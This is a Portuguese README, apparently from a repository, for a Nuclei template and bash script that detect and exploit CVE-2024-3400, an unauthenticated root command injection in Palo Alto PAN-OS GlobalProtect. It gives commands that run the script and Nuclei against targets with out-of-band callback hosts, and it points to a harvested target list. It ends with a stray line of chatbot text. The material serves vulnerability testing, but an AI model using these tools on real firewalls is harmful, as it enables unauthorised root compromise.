
Nuclei template e script bash para detetar e explorar a injeção de comandos CVE-2024-3400 no Palo Alto PAN-OS GlobalProtect, permitindo execução de código não autenticada ao nível de root.


Uma injeção de comando resultante de uma vulnerabilidade de criação arbitrária de arquivos no recurso GlobalProtect do software PAN-OS da Palo Alto Networks, em versões específicas do PAN-OS e configurações de recursos distintas, pode permitir que um atacante não autenticado execute código arbitrário com privilégios de root no firewall.
Cloud NGFW, appliances Panorama e Prisma Access não são afetados por esta vulnerabilidade.
Este repositório contém um template Nuclei projetado para detectar vulnerabilidades relacionadas a bugs do Palo Alto PAN-OS, visando especificamente a CVE-2024-3400.
Uma lista abrangente de pesquisas foi feita por
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Execute o seguinte comando para executar o script Bash:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
O script verificará se um arquivo foi criado (retornando um status 200 OK). Se for bem-sucedido, ele verificará então se o arquivo existe (retornando um status 403 Forbidden).
interactsh-client -v
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
Uma lista de alvos potenciais pode ser encontrada aqui.
python fofax3r.py
Este README.md fornece informações sobre a vulnerabilidade, como usar os scripts fornecidos, alvos potenciais e credita o autor. Avise-me se precisar de quaisquer ajustes adicionais!